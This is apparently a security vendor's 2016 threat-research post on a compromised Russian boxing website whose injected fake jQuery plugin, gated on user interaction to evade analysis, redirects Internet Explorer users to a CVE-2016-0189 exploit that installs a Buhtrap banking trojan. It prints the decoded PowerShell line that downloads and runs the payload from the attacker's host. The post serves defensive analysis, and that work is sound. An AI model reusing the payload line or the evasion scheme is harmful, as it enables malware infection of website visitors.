Highly Evasive Code Injection Awaits User Interaction Before Delivering Malware
On September 27, 2016 Forcepoint Security Labs noticed that the Russian boxing site allboxing[.]ru was compromised. The site is injected with code that attempts to silently redirect users to a third party website containing an exploit and a Russian banking trojan. The injected code employs several evasion tactics, and ensures that the redirect only occurs when there is significant user interaction on the website.
Hiding in Plain Sight
The site allboxing[.]ru is a very popular Russian boxing website receiving an estimated 3 million visitors per month.
One of the scripts being used by the website at hxxp://allboxing[.]ru/misc/jquery.once.js?v=1.2 has been modified to include additional code. The code claims to be loading a jQuery plugin called "jQuery Animate Plugin v1.2" but this is in fact a fake plugin inserted by the attacker.
Once of the giveaways here is that the URL reference for the plugin links to "http://plugins.jquery.com/tag/animate", whereas legitimate plugins will usually reference the project name directly such as "http://plugins.jquery.com/project/once". Nevertheless, the attacker has made significant effort to blend in with the legitimate content by using the same formatting and comment style.
The modified jquery.once.js script loads a second script from /misc/jquery.animate.js which in turn attempts to insert a script from the attacker's own website. The script is not inserted if the user's browser is either Chrome or Opera, presumably because the attacker is not able to exploit these browsers.
The automate.js script on getcanvas[.]org then waits for user interaction before inserting an iFrame to an exploit.
The script ensures that sufficient user interaction has occurred from either clicking, scrolling or moving the mouse. The attacker has given different weighting scores to the different types of user interaction and will only insert the iFrame once the threshold score is above 30. This is a stealth tactic used to prevent automated analysis systems from being redirected to the exploit. The technique was first documented back in 2014 in a similar infection chain.
Another stealth tactic employed here is the domain name and URL path which has been used. The term "canvas" is a well known boxing term and the URL contains the word "sport". This makes the URL appear a lot less suspicious considering that allboxing[.]ru is a boxing news site.
Exploiting Internet Explorer
The malicious iFrame inserted by the attacker was located at hxxp://getcanvas[.]org/sport/page/5.html. The page contains a VBScript exploit that leverages CVE-2016-0189 and attempts to run a Powershell script on the machine.
The Powershell script decodes to the following:
(New-Object System.Net.WebClient).DownloadFile("http://getcanvas.org/sport/boxing/tysonfury.jpg","islzma32.exe");(New-Object -com Shell.Application).ShellExecute("islzma32.exe");
The script downloads and executes tysonfury.jpg which is a variant of the Buhtrap Russian banking trojan. The SHA1 of the sample we received is b74f71560e48488d2153ae2fb51207a0ac206e2b.
Forcepoint™ customers are protected against this threat via TRITON® ACE at the following stages of attack:
- Stage 2 (Lure) - The fake jQuery plugin is identified and blocked.
- Stage 3 (Redirect) - The attempt to insert a malicious iFrame onto the page is blocked.
- Stage 4 (Exploit) - The CVE-2016-0189 exploit is identified and blocked.
- Stage 5 (Dropper) - The Buhtrap malware is prevented from being downloaded.
- Stage 6 (Call Home) - Attempts by the Buhtrap variant to call home are identified and blocked.
Attackers are getting better at disguising the code they inject into compromised websites. Websites with high volumes of traffic are a popular choice for attackers, and this is especially true if the bulk of the traffic is from a specific region of the world of interest to the attacker. With the recent arrests of actors using the Lurk banking trojan, Buhtrap appears to be a likely alternative for actors wishing to target Russian banks and software.
Indicators of Compromise
Buhtrap Sample (SHA1)
b74f71560e48488d2153ae2fb51207a0ac206e2b aa0fa4584768ce9e16d67d8c529233e99ff1bbf0 193dd67915d544409e8c5722c22175b0f417999c
Buhtrap Command-and-Control Server